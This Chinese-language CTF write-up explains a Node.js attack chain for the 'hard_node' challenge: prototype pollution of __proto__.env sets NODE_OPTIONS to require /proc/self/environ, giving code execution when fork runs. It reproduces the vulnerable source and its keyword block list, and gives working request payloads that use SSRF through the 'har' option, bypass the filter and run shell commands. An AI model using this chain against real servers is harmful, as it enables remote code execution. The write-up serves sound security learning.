Node 从8.0 开始支持 NODE_OPTIONS,而 Node 的参数中有一项名为 --require,可以加载执行一段 JavaScript 代码。这就是一切的起源。

ToC

当 NODE_OPTIONS 遇到 fork

我们先来看一下 child_process.fork 的源码:

function fork(modulePath /* , args, options */) {
  validateString(modulePath, "modulePath");
  // Get options and args arguments.
  let execArgv;
  let options = {};
  let args = [];
  let pos = 1;
  if (pos < arguments.length && ArrayIsArray(arguments[pos])) {
    args = arguments[pos++];
  }
  if (
    pos < arguments.length &&
    (arguments[pos] === undefined || arguments[pos] === null)
  ) {
    pos++;
  }
  if (pos < arguments.length && arguments[pos] != null) {
    if (typeof arguments[pos] !== "object") {
      throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]);
    }
    options = { ...arguments[pos++] };
  }
  // Prepare arguments for fork:
  execArgv = options.execArgv || process.execArgv;
  if (execArgv === process.execArgv && process._eval != null) {
    const index = execArgv.lastIndexOf(process._eval);
    if (index > 0) {
      // Remove the -e switch to avoid fork bombing ourselves.
      execArgv = execArgv.slice();
      execArgv.splice(index - 1, 2);
    }
  }
  args = execArgv.concat([modulePath], args);
  if (typeof options.stdio === "string") {
    options.stdio = stdioStringToArray(options.stdio, "ipc");
  } else if (!ArrayIsArray(options.stdio)) {
    // Use a separate fd=3 for the IPC channel. Inherit stdin, stdout,
    // and stderr from the parent if silent isn't set.
    options.stdio = stdioStringToArray(
      options.silent ? "pipe" : "inherit",
      "ipc"
    );
  } else if (!options.stdio.includes("ipc")) {
    throw new ERR_CHILD_PROCESS_IPC_REQUIRED("options.stdio");
  }
  options.execPath = options.execPath || process.execPath;
  options.shell = false;
  return spawn(options.execPath, args, options);
}

看到第 52 行。当 options 中没有 execPath 中,fork 会尝试使用 process.execPath,也就是 node 本身。如果我们还可以控制 options.env,那就可以在 fork 执行之前先执行一段我们想要执行的代码。

原型链注入

原型链注入是老生长谈的 Node 安全漏洞了。这次,我们需要通过它写入 env,以在 fork 时传入环境变量。

通过注入 __proto__.env,向其中写入:

{
  "NODE_OPTIONS": "--require path/to/file.js"
}

我们就可以执行对应的 JavaScript 了。那如果不能借助文件,我们又该怎么办呢?

/proc

通过 /proc/self/environ,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload 修改成下面的形式:

{
  "AAAA": "console.log("2333")//",
  "NODE_OPTIONS": "--require /proc/self/environ"
}

就可以在 fork 之前向控制台打印出 2333 了。这里的 AAAA 是为了让这条环境变量在 /proc/self/environ 中能显示在最前,而后面的 // 则是为了注释掉之后的内容,防止执行出现问题。AAAA// 的配合使得只有我们希望的代码被执行,提高了破坏力。

实战

这题据 CTFHub 说是 2020 第五空间决赛的 Web 题,名字是 hard_node,在 CTFHub 上可以找到。但 CTFHub 上没给源码,所以这里附一下源码。

const express = require("express");
const bodyParser = require("body-parser");
const proc = require("child_process");
const request = require("request");
const ip = require("ip");
const manage = require("./manage.js");
const path = require("path");
const app = express();
app.use(bodyParser.urlencoded({ extended: true }));
app.use(bodyParser.json());
app.use(express.static(path.join(__dirname, "public")));
//stop hackers
const disallowedKeys = [
  "__proto__",
  "prototype",
  "constructor",
  "eval",
  "proccess",
  "root",
  "global",
  "exec",
  "!",
  "fs",
];
function isValidPath(segment) {
  disallowedKeys.forEach(evilWord => {
    if (segment.toString().indexOf(evilWord) !== -1) {
      return false;
    }
  });
  return true;
}
app.post("/add", (req, res) => {
  let ip = req.ip;
  console.log(ip.m);
  if (ip.substr(0, 7) == "::ffff:") {
    ip = ip.substr(7);
  }
  console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`);
  if (ip != "127.0.0.1" && ip != server_ip) {
    res.status(403).send("Not Edit from Local!");
  } else {
    if (req.body.userName && req.body.nameVal) {
      let username = req.body.userName;
      let nameVal = req.body.nameVal;
      if (!isValidPath(username) || !isValidPath(nameVal)) {
        username = "username";
        nameVal = "guest";
      }
      manage.set(object, username, nameVal);
      console.log(ip.k);
      console.log(object);
      res.send(`
            <h1>Edit Success</h1>
            <a href="/admin">View Admin Page</a>`);
    } else {
      res.send("param error");
    }
  }
});
app.get("/admin", (req, res) => {
  if (manage.get(object, "username", "guest") === "admin") {
    console.log("Current User:" + object.username);
    const child = proc.fork(`${__dirname}/public/user.js`, ["admin"]);
    child.on("message", body => {
      res.status(200).send(body);
    });
    child.on("close", (code, signal) => {
      console.log(`subproccess ended with ${signal}`);
    });
  } else {
    res.status(403).send("Only Admin Can View this");
  }
});
app.get("/getContent", (req, res) => {
  res.sendfile(`${__dirname}/public/guest.html`);
});
app.get("/", (req, res) => {
  // console.log(req.body)
  let uri = req.query.url ? req.query.url : "http://127.0.0.1:3000/getContent";
  console.log(uri);
  try {
    request.get(uri, (err, response, data) => {
      if (!err && response.statusCode == 200) {
        res.send(data);
      } else {
        console.log(err);
      }
    });
  } catch (e) {
    console.log(e);
  } finally {
    console.log("Make Server Continue Running");
  }
});
var object = { username: "guest" };
var server_ip = ip.address();
app.listen(3002);
console.log(`${server_ip} is starting at port 3000`);
const isObj = require("is-obj");
var manage = {
  getPathSegments: function (path) {
    const pathArray = path.split(".");
    const parts = [];
    for (let i = 0; i < pathArray.length; i++) {
      let p = pathArray[i];
      while (p[p.length - 1] === "\\" && pathArray[i + 1] !== undefined) {
        p = p.slice(0, -1);
        p += pathArray[++i];
      }
      parts.push(p);
    }
    return parts;
  },
  get: function (object, path, value) {
    if (!isObj(object) || typeof path !== "string") {
      return value === undefined ? object : value;
    }
    const pathArray = this.getPathSegments(path);
    for (let i = 0; i < pathArray.length; i++) {
      if (!Object.prototype.propertyIsEnumerable.call(object, pathArray[i])) {
        return value;
      }
      object = object[pathArray[i]];
      if (object === undefined || object === null) {
        if (i !== pathArray.length - 1) {
          return value;
        }
        break;
      }
    }
    return object;
  },
  set: function (object, path, value) {
    Object.keys(Object.prototype).forEach(function (Val) {
      if (!Object.hasOwnProperty(Val)) {
        delete Object.prototype[Val];
        console.log(`${Val} is delete`);
      }
    });
    if (!isObj(object) || typeof path !== "string") {
      return object;
    }
    const root = object;
    const pathArray = this.getPathSegments(path);
    for (let i = 0; i < pathArray.length; i++) {
      const p = pathArray[i];
      if (!isObj(object[p])) {
        object[p] = {};
      }
      if (i === pathArray.length - 1) {
        object[p] = value;
      }
      object = object[p];
    }
    return root;
  },
};
module.exports = manage;

可以看到,manager.jsset 存在明显的原型链注入,而通过 getPathSegments 又可以以 \\. 的方式绕过黑名单的检测。

我们发现,修改信息只能通过 /add 进行,这里有一个内网限定访问,可以使用 requesthar 来实现:

http  --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'

然后执行写入要执行的代码:

http  --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'

最后访问 /admin 就可以了。

(最后从 CTFHub 上把源码偷下来了:https://drive.google.com/file/d/1z6zT48OI7zeUjWwIJvma66_2ZGIMz1M2/view?usp=sharing

参考

  1. https://xz.aliyun.com/t/6755
  2. https://blog.szfszf.top/article/47/
  3. https://github.com/mpgn/CVE-2019-7609